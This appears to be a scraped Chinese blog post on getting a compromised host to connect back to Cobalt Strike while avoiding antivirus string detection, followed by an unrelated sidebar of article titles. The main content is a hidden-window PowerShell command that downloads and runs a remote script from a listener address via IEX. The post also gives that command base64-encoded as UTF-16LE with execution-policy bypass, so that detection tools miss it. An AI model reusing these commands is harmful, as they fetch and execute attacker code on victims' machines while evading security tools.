当前位置:网站首页>powershell cs-UTF-16LE编码上线
powershell cs-UTF-16LE编码上线
2022-07-07 09:59:00 【kuxing_admin】
0x01前言
当我们要上线主机的时候,可能会因为你的代码含有木马字符串,导致无法上线
0x02问题
1、 例子
powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA=
2、原句子powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.103:80/a'))"
3、UTF-16LE编码后 (在powershell上能直接执行)
powershell.exe -w hidden -exec bypass -encodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMAAuADEAMAAzADoAOAAwAC8AYQAnACkAKQA=
主机上线
边栏推荐
- sql里,我想设置外键,为什么出现这个问题
- Camera calibration (1): basic principles of monocular camera calibration and Zhang Zhengyou calibration
- 一度辍学的数学差生,获得今年菲尔兹奖
- 【愚公系列】2022年7月 Go教学课程 005-变量
- [shortest circuit] acwing 1127 Sweet butter (heap optimized dijsktra or SPFA)
- What is high cohesion and low coupling?
- 【神经网络】卷积神经网络CNN【含Matlab源码 1932期】
- 聊聊SOC启动(九) 为uboot 添加新的board
- 正在運行的Kubernetes集群想要調整Pod的網段地址
- The Oracle message permission under the local Navicat connection liunx is insufficient
猜你喜欢
Design intelligent weighing system based on Huawei cloud IOT (STM32)
Apprentissage comparatif non supervisé des caractéristiques visuelles par les assignations de groupes de contrôle
禁锢自己的因素,原来有这么多
聊聊SOC启动(六)uboot启动流程二
一起探索云服务之云数据库
超标量处理器设计 姚永斌 第10章 指令提交 摘录
相机标定(2): 单目相机标定总结
Talk about SOC startup (VI) uboot startup process II
【紋理特征提取】基於matlab局部二值模式LBP圖像紋理特征提取【含Matlab源碼 1931期】
【滤波跟踪】捷联惯导纯惯导解算matlab实现
随机推荐
STM32F1与STM32CubeIDE编程实例-315M超再生无线遥控模块驱动
[question] Compilation Principle
聊聊SOC启动(六)uboot启动流程二
大佬们有没有人遇到过 flink oracle cdc,读取一个没有更新操作的表,隔十几秒就重复读取
【纹理特征提取】基于matlab局部二值模式LBP图像纹理特征提取【含Matlab源码 1931期】
Electron adding SQLite database
问下flinkcdc2.2.0的版本,支持并发,这个并发是指多并行度吗,现在发现,mysqlcdc全
本地navicat连接liunx下的oracle报权限不足
C#中在路径前加@的作用
【滤波跟踪】捷联惯导纯惯导解算matlab实现
浙江大学周亚金:“又破又立”的顶尖安全学者,好奇心驱动的行动派
R語言使用magick包的image_mosaic函數和image_flatten函數把多張圖片堆疊在一起形成堆疊組合圖像(Stack layers on top of each other)
聊聊SOC启动(七) uboot启动流程三
.NET MAUI 性能提升
STM32入门开发 编写DS18B20温度传感器驱动(读取环境温度、支持级联)
LeetCode - 面试题17.24 最大子矩阵
About how to install mysql8.0 on the cloud server (Tencent cloud here) and enable local remote connection
STM32 entry development NEC infrared protocol decoding (ultra low cost wireless transmission scheme)
R language uses the quantile function to calculate the quantile of the score value (20%, 40%, 60%, 80%), uses the logical operator to encode the corresponding quantile interval (quantile) into the cla
Half of the people don't know the difference between for and foreach???